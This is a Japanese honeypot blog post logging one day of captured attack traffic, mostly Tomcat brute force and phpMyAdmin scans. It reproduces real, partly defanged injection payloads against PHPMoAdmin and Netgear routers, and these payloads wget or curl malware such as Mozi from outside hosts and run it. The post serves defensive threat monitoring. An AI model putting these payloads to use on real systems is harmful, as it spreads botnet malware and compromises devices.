WOWHoneypot観察(272日目)
2019/12/13(金)
トータルは506件でした。
ハンティングログは以下です。
61.206.220[.]246 wget+hxxp[:]//94.177.249[.]95/mipsel |
208.97.139[.]102 wget hxxp[:]//145.249.106.241/richard; curl -O hxxp[:]//145.249.106[.]241/richard
208.97.139[.]102 curl -O hxxp[:]//145.249.106.241/richard
www.virustotal.com
www.virustotal.com
222.137.135[.]143 wget+hxxp[:]//222.137.135.143:52699/Mozi.m|
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
424 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
48 | アクセス | GET / |
2 | PHPMoAdminの脆弱性を狙った通信 | POST /moadmin/moadmin.php?object=1;system(wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard);exit |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | LinksysルータのEシリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 不正中継の調査 | GET hxxp[:]//www.ceek.jp/?0.5868606403708541299088 |
1 | 不正中継の調査 | GET hxxp[:]//mail.21cn.com/?0.346522739226757363939240 |
1 | Netgearルータの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//222.137.135.143:52699/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | Netgearルータの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
1 | phpMyAdminの調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | phpMyAdminの調査 | GET /sqladmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /sql/scripts/setup.php |
1 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /php/scripts/setup.php |
1 | phpMyAdminの調査 | GET /phmyadm/scripts/setup.php |
1 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /myadm/scripts/setup.php |
1 | phpMyAdminの調査 | GET /muieblackcat |
1 | phpMyAdminの調査 | GET /is_test |
1 | phpMyAdminの調査 | GET /admin/connection/ |
1 | phpMyAdminの調査 | GET /SQLadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /SQL/setup.php |
1 | phpMyAdminの調査 | GET /SQL/scripts/setup.php |
1 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |